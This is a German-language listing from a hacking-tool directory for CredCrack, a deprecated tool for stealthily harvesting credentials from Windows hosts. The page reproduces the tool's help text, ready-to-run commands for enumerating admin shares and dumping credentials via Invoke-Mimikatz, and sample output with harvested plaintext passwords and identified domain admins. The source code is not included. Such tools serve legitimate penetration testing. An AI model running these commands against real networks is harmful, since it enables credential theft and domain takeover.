Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CredCrack — Ein schneller und unauffälliger Credential-Harvester | Kitploit
Tools/GitHubGitHub/jobroche/credcrack
Laterale BewegungInformationsbeschaffungPost-ExploitationPenetrationstests
GitHubjobroche/credcrack

CredCrack

Ein schneller und unauffälliger Credential-Harvester

Repository anzeigen
6261075vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CredCrack

⛔ [VERALTET]. Dieses Repository wird nicht mehr gepflegt. Bitte erwägen Sie die Verwendung von CrackMapExec.

Einführung


CredCrack ist ein schneller und unauffälliger Credential-Harvester. Es extrahiert Anmeldeinformationen rekursiv aus dem Speicher und im Klartext. Nach Abschluss analysiert und gibt CredCrack die Anmeldeinformationen aus und identifiziert dabei alle erlangten Domänenadministratoren. CredCrack kann auch Freigabeberechtigungen auflisten und aufzählen – und ja, es ist multithreaded!

CredCrack wurde getestet und läuft mit den nativ in Kali Linux vorhandenen Tools. CredCrack setzt lediglich voraus, dass sich „Invoke-Mimikatz.ps1“ von PowerSploit im Verzeichnis /var/www befindet. Invoke-Mimikatz hier herunterladen

Hilfe


root@kitploit:~
usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
                    [-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per
                        line.
  -r RHOST, --rhost RHOST
                        Remote host IP to harvest creds from.
  -es, --enumshares     Examine share access on the remote IP(s)
  -l LHOST, --lhost LHOST
                        Local host IP to launch scans from.
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)

Required:
  -d DOMAIN, --domain DOMAIN
                        Domain or Workstation
  -u USER, --user USER  Domain username

Examples: 

./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20
Tool herunterladen

Beispiele


Aufzählen von Freigabeberechtigungen

root@kitploit:~
./credcrack.py -r 192.168.1.100 -d acme -u bob --es
Password:
 ---------------------------------------------------------------------
  CredCrack v1.1 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------
 
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Validating 192.168.1.100

 -----------------------------------------------------------------
 192.168.1.102 - Windows 7 Professional 7601 Service Pack 1 
 -----------------------------------------------------------------
 
 OPEN      \\192.168.1.102\ADMIN$ 
 OPEN      \\192.168.1.102\C$ 

 -----------------------------------------------------------------
 192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service Pack 2 
 -----------------------------------------------------------------
 
 OPEN      \\192.168.1.103\ADMIN$ 
 OPEN      \\192.168.1.103\C$ 
 CLOSED    \\192.168.1.103\F$ 

 -----------------------------------------------------------------
 192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
 -----------------------------------------------------------------
 
 CLOSED    \\192.168.1.100\ADMIN$ 
 CLOSED    \\192.168.1.100\C$ 
 OPEN      \\192.168.1.100\NETLOGON 
 OPEN      \\192.168.1.100\SYSVOL 

[*] Done! Completed in 0.8s

Sammeln von Anmeldeinformationen


root@kitploit:~
./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:

 ---------------------------------------------------------------------
  CredCrack v1.1 by Jonathan Broche (@g0jhonny)
 ---------------------------------------------------------------------
 
[*] Setting up the stage
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Querying domain admin group from 192.168.1.102
[*] Harvesting credentials from 192.168.1.102
[*] Harvesting credentials from 192.168.1.103

                  The loot has arrived...
                         __________
                        /\____;;___\    
                       | /         /    
                       `. ())oo() .      
                        |\(%()*^^()^\       
                       %| |-%-------|       
                      % \ | %  ))   |       
                      %  \|%________|       

                
[*] Host: 192.168.1.102 Domain: ACME User: jsmith Password: Good0ljm1th
[*] Host: 192.168.1.103 Domain: ACME User: daguy Password: P@ssw0rd1!

     1 domain administrators found and highlighted in yellow above!

[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s

Kontakt

Kontaktieren Sie mich unter @g0jhonny bei Fragen oder Funktionen, die Sie im nächsten Update sehen möchten. Fehler melden Sie bitte über ein Issue!

Danksagungen

CredCrack wäre ohne die Beiträge der folgenden Personen nicht möglich gewesen. Ihr seid alle Rockstars! @JosephBialek, @brav0hax, @altonjx und alle anderen! Vielen Dank für all eure Beiträge und Rückmeldungen, die dieses Skript besser gemacht haben – macht weiter so!